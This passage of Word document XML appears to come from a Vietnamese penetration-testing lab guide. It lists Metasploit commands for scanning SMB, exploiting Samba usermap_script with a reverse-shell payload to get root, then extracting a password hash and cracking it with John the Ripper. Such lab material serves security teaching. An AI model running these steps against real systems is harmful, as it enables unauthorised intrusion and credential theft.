      <w:r w:rsidRPr="00AA6CCE">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">- Khai báo sử dụng mô đun tấn công: msf &gt; use auxiliary/scanner/smb/smb_version </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E5484E" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24139FE5" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00AA6CCE" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA6CCE">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D5AB778" wp14:editId="2C3D4545">
            <wp:extent cx="3337849" cy="4648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994" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA6CCE">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>- Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694CBDE2" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="401D6D01" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00AA6CCE" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA6CCE">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45973744" wp14:editId="55300551">
            <wp:extent cx="4915326" cy="1859441"/>
            <wp:effectExtent l="0" t="0" r="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9A67" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA6CCE">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Đặt địa chỉ IP máy victim: msf &gt; set RHOST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408F2F7E" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501DD8F4" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00AA6CCE" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D7B3D">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E48D78F" wp14:editId="3B824857">
            <wp:extent cx="4709568" cy="4801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CDD" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA6CCE">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>- Thực thi tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DDC40D" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB728A7" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D7B3D">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="101DFEB6" wp14:editId="69C13C12">
            <wp:extent cx="5189670" cy="130313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0CB" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F859971" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D7B3D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.4 Khai thác lỗi trên Samba cho phép mở shell chạy với quyền root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035C5AE6" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="007C0FE5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 xml:space="preserve">- Khởi động Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0917CAAD" w14:textId="77777777" w:rsidR="000551DB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 xml:space="preserve">- Khai báo sử dụng mô đun tấn công: msf &gt; use exploit/multi/samba/usermap_script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C70D43" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F54A8F2" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="007C0FE5" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0FE5">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="352A61F8" wp14:editId="35FD425B">
            <wp:extent cx="3589331" cy="419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B15" w14:textId="77777777" w:rsidR="000551DB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>- Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CFDCD4" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48576D55" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="007C0FE5" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0FE5">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FE7800A" wp14:editId="7F27D772">
            <wp:extent cx="5243014" cy="329974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E5">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0A382F" w14:textId="77777777" w:rsidR="000551DB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 xml:space="preserve">- Đặt địa chỉ IP máy victim: msf &gt; set RHOST </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1A48E6" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476B99FD" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="007C0FE5" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0FE5">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36812C1F" wp14:editId="148676E8">
            <wp:extent cx="4717189" cy="4572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5143" w14:textId="77777777" w:rsidR="000551DB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 xml:space="preserve">- Chọn payload cho thực thi (mở shell): msf &gt; set payload cmd/unix/reverse </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDD1C5B" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73959E8E" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="007C0FE5" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0FE5">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="058C6D5D" wp14:editId="774C3C68">
            <wp:extent cx="4999153" cy="36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A313" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="005D7B3D" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0FE5">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>- Đặt 445 là cổng truy cập máy victim: msf &gt; set RPORT 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ACE28D" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A7BFC1C" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125FE4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42B667C1" wp14:editId="6AB72842">
            <wp:extent cx="4138019" cy="35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A38D" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722628D8" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125FE4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">-Chạy lệnh “show options” để xem các thông tin về thiết lập tấn công đang sử dụng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF9D164" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E2CAF5" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00125FE4" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125FE4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F906151" wp14:editId="30F22523">
            <wp:extent cx="5250635" cy="3246401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0CD8" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125FE4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>- Thực thi tấn công: msf &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A68D44" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68863887" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125FE4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="548778D8" wp14:editId="6C33DB18">
            <wp:extent cx="5303980" cy="21947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702F" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50636615" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125FE4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Chạy các lệnh để đọc tên người dùng và máy đang truy cập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10501783" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA2C352" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125FE4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C6925C0" wp14:editId="08D9FE4F">
            <wp:extent cx="5303980" cy="1569856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0C9C" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AECA532" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125FE4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Lấy tên người dùng và mật khẩu đã tạo ở mục 3.1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438A57EA" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5B834D" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000145CA">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DFDE216" wp14:editId="7FD7211B">
            <wp:extent cx="4381880" cy="57917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BE7" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790EC8F8" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4740B9F2" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E2431A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">-Chọn và sao chép cả dòng tên người dùng và mật khẩu băm vào clipboard </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192A4977" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E2431A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">- Mở một cửa sổ Terminal mới, chạy lệnh: nano password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065117D3" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00E2431A" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E2431A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sau đó paste thông tin tên người dùng và mật khẩu băm từ clipboard vào file password Gõ Ctrl-x để lưu vào file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700BB8F7" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000145CA">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B1E1512" wp14:editId="4C1B54F1">
            <wp:extent cx="5464013" cy="2255715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83B" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE53382" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00E2431A" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E2431A">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-Crack để lấy mật khẩu sử dụng chương trình john the ripper (hoặc 1 công cụ crack mật khẩu khác):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF5E548" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3069D9F1" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00125FE4" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000145CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F966FB3" wp14:editId="5948112C">
            <wp:extent cx="5700254" cy="3787468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C3D9" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00AA6CCE" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E9838BE" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00AA6CCE" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C5B3DB" w14:textId="77777777" w:rsidR="000551DB" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B91A26F" w14:textId="77777777" w:rsidR="000551DB" w:rsidRPr="00400ADF" w:rsidRDefault="000551DB" w:rsidP="000551DB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D920EC2" w14:textId="7A50D1B3" w:rsidR="00400ADF" w:rsidRPr="00400ADF" w:rsidRDefault="00400ADF" w:rsidP="000551DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00400ADF" w:rsidRPr="00400ADF" w:rsidSect="00355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9AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E6C6D3A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E91"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F49462D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762"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FAD2D8C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C6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A52AB9F6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D0033"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A01CF33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855B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C60FA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010E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3ED620F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E589C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B881C9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96CA6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B30A2E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525"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07FCA1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555"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7DACB1C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6F01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E8CE3F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48D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4C827A4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D2CD1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED045A28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1A3E5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B5D8D1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69D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B0C4C5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293E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBD099D4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3035993"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B9CFF8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64232"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A3EA7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30E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="468AADD0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F1002F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E0275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C0421"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="232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5328E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4C28140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2E7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EEEC8C4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38CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D1697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30664"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8D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F71182"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2236D1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1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26DE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9294CEE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"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="27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14"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="3"/>
  </w:num>
